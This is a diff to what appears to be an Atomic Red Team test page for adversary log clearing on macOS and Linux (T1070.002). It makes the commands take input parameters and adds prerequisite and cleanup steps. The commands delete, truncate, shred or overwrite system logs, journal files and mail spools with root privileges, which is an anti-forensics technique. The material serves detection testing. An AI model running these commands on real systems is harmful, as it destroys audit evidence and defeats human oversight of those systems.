@@ -94,7 +113,6 @@ This test deletes main log datastore, inflight log data, time-to-live data(TTL), ```sh sudo log erase --all sudo log erase --ttl #Deletes only time-to-live log content -sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log ``` @@ -117,18 +135,35 @@ This test truncates the system log files using the truncate utility with (-s 0 o +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path of system log to delete. | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo truncate -s 0 /var/log/system.log #size parameter shorthand -sudo truncate --size=0 /var/log/system.log #size parameter +sudo truncate -s 0 #{system_log_path} #size parameter shorthand +sudo truncate --size=0 #{system_log_path} #size parameter ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -146,18 +181,35 @@ The first sub-test truncates the log file to zero bytes via /dev/null and the se +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path of system log to delete. | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes -sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros) +sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes +sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros) ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -175,19 +227,38 @@ This test finds and deletes the system log files within /var/log/ directory usin +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_name1 | name or prefix of system log to delete. | string | system.log| +| system_log_name2 | name or prefix of system log to delete. | string | system.log.97.gz| +| system_log_name3 | name or prefix of system log to delete. | string | system.log.98.gz| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution -sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution -sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution +sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution +sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution +sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3} +``` +##### Get Prereq Commands: +```sh +touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3} +``` + +
@@ -205,12 +276,17 @@ This test overwrites the contents of system log file with an empty string using +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo echo '' > /var/log/system.log +sudo echo '' > #{system_log_path} ``` @@ -261,17 +337,34 @@ This test deletes the system log file using unlink utility +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo unlink /var/log/system.log +sudo unlink #{system_log_path} ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -289,17 +382,34 @@ This test overwrites the contents of the log file with zero bytes(-z) using thre +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo shred -u -z -n 3 /var/log/system.log +sudo shred -u -z -n 3 #{system_log_path} ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -319,18 +429,36 @@ Refer: https://github.com/khell/homebrew-srm/issues/1 for installation +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| +| system_log_folder | path to log parent folder | string | /var/log/| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo srm /var/log/system.log #system log file deletion -sudo srm -r /var/log/ #recursive deletion of log files +sudo srm #{system_log_path} #system log file deletion +sudo srm -r #{system_log_folder} #recursive deletion of log files ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} #{system_log_folder} +``` +##### Get Prereq Commands: +```sh +mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log +``` + +
@@ -348,17 +476,34 @@ This test deletes the system log file using osascript via "do shell script"(sh/b +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges' +osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges' ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -378,17 +523,34 @@ Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| system_log_path | path to system.log | string | /var/log/system.log| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"' +osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"' ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{system_log_path} +``` +##### Get Prereq Commands: +```sh +touch #{system_log_path} +``` + +
@@ -406,18 +568,35 @@ The first sub-test deletes the journal files using rm utility in the "/var/log/j +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| journal_folder | path to journal logs | string | /var/log/journal| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content +sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat #{journal_folder} +``` +##### Get Prereq Commands: +```sh +mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal +``` + +
@@ -441,7 +620,7 @@ This test overwrites the Linux mail spool of a specified user. This technique wa | username | Username of mail spool | string | root| -#### Attack Commands: Run with `bash`! +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash @@ -451,6 +630,18 @@ echo 0> /var/spool/mail/#{username} +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +stat /var/spool/mail/#{username} +``` +##### Get Prereq Commands: +```sh +touch /var/spool/mail/#{username} +``` + +
@@ -474,13 +665,17 @@ This test overwrites the specified log. This technique was used by threat actor | log_path | Path of specified log | path | /var/log/secure| -#### Attack Commands: Run with `bash`! +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash echo 0> #{log_path} ``` +#### Cleanup Commands: +```bash +if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi +```